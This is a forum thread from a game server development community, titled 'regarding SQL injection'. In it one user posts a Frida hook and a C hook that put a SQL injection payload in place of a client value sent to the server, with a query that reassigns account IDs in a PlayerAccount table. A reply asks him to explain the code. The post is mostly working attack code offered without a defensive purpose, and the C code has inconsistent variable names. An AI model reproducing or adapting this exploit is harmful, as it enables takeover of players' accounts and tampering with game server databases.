Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

regarding SQL injection

the1Domo

the1Domo

Founder of EvilSource
10 Happy Years
Joined
Jun 17, 2010
Messages
323
Reaction score
267
Code: 
0x6031C0

Interceptor.attach(ptr("0x6031C0"), {
 onLeave: function(retval){
  var request = "?');update PlayerAccount set Account_ID='ACCOUNT_ID_NEW' where Account_ID='ACCOUNT_ID';--";
  retval.replace(Memory.allocUtf8String(request));
 }
})





RF_O_UP_FUNC_CONTEXT(getMac_hook, 0x6031C0, 0x0); //eax as this
char* read_request(){
 FILE *f = fopen("C:\\request.txt", "r");
 fseek(f, 0, SEEK_END);
 long fsize = ftell(F);
 fseek(f, 0, SEEK_SET);

 char *string = (char*)malloc(fsize + 1);
 fread(string, fsize, 1, f);
 fclose(F);

 string[fsize] = 0;
 return string;
}

void getMac_hook(Context *context){
 int *ptr = (int*)(void*)(context->ESP);
 ptr[5] = (int)(int*)read_request();
}



getMac_hook("update PlayerAccount set Account_ID='ACCOUNT_ID_NEW' where Account_ID='ACCOUNT_ID';--");
 
The Best DDoS Protected Servers
L

Lifefire

Junior Spellweaver
Joined
May 9, 2018
Messages
181
Reaction score
126
Domo, while i can tell what this does and so can a few others, a lot of others may not be able to. You should let them know what to do with it.
 
You must log in or register to reply here.

About Us

RaGEZONE® is a website dedicated to the development of massively multiplayer online role-playing games (MMORPGs).

Online statistics

Members online
227
Guests online
2,931
Total visitors
3,158
Totals may include hidden visitors.

Forum statistics

Threads
428,888
Messages
4,589,203
Members
279,602
Latest member
arakiritest
Most visitors online was 8830 , on 6 Feb 2024

RaGEZONE Sponsor

    HyperFilter
Back
Top